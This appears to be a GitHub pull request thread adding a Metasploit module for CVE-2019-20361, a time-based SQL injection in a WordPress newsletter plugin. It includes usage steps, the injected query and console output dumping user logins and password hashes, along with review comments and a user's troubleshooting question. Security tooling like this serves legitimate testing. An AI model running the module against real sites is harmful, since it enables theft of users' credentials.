Wordpress plugin: Email Subscribers & Newsletters sqli (CVE-2019-20361)

[h00die]

This PR adds a module and docs for CVE-2019-20361, a time based sqli in wordpress plugin Email Subscribers & Newsletters < 4.3.1

Verification

• Install the plugin on wordpress.
• Start msfconsole
• Do: use auxiliary/scanner/http/wp_email_sub_news_sqli
• Do: set rhosts [ip]
• Do: set action [action]
• Do: run

msf6 > use auxiliary/scanner/http/wp_email_sub_news_sqli 
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set count 3
count => 3
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > run
[*] Checking /wp-content/plugins/email-subscribers/readme.txt
[*] Found version 4.2.2 in the plugin
[+] Vulnerable version detected
[*] {SQLi} Executing (select group_concat(yKaoA) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) yKaoA from wp_users limit 3) adO)
[*] {SQLi} Time-based injection: expecting output of length 124
[+] wp_users
========
 user_login  user_pass
 ----------  ---------
 admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
 admin2      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
 editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[smcintyre-r7]

It looks like the logic from check_plugin_version_from_readme can also return Appears, Detected and Unknown under some conditions. Continuing on Vulnerable, Appears and Detected like AutoCheck mixin does would be a bit more robust here.

[smcintyre-r7]

So turns out Rex text actually has a builtin method for this: Rex::Text.rand_mail_address.

[h00die]

looks good, retested and working!

[smcintyre-r7]

Works as intended, I'll get this landed. Tested with COUNT above and below the actual number of users.

Testing Output

msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set RHOSTS 192.168.159.31
RHOSTS => 192.168.159.31
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > show options 

Module options (auxiliary/scanner/http/wp_email_sub_news_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COUNT      1                no        Number of users to enumerate
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.31   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


Auxiliary action:

   Name        Description
   ----        -----------
   List Users  Queries username, password hash for COUNT users


msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set COUNT 5
COUNT => 5
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > run

[+] Vulnerable version detected

[+] wp_users
========

 user_login  user_pass
 ----------  ---------
 aliddle     [redacted]                        
 smcintyre   [redacted]                        
 user        [redacted]                        

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > 
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set COUNT 1
COUNT => 1
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > run

[+] Vulnerable version detected
[+] wp_users
========

 user_login  user_pass
 ----------  ---------
 user        [redacted]                        

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > creds 
Credentials
===========

host            origin          service        public     private                             realm  private_type        JtR Format
----            ------          -------        ------     -------                             -----  ------------        ----------
                192.168.159.31                 user       [redacted]                                 Nonreplayable hash  phpass
                192.168.159.31                 smcintyre  [redacted]                                 Nonreplayable hash  phpass
                192.168.159.31                 aliddle    [redacted]                                 Nonreplayable hash  phpass

[smcintyre-r7]

Release Notes

New module auxiliary/scanner/http/wp_email_sub_news_sqli adds an exploit for CVE-2019-20361 which is a SQLi in the Email Subscribers & Newsletters Wordpress plugin. The vulnerability can be leveraged to leak usernames and their password hashes.

[hackercoolmagz]

While I am executing this module, I am getting this error. Can anybody tell what is wrong?

msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > exploit

[] Checking /wordpress5.4/wp-content/plugins/email-subscribers/readme.txt
[] Found version 4.2.2 in the plugin
[+] Vulnerable version detected
[-] payload-failed: 192.168.36.148:80 - Testing of SQLi failed. If this is time based, try increasing SqliDelay.
[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed

[hackercoolmagz]

I tried increasing the SQLidelay to 10, but the error persists.

[h00die]

What db?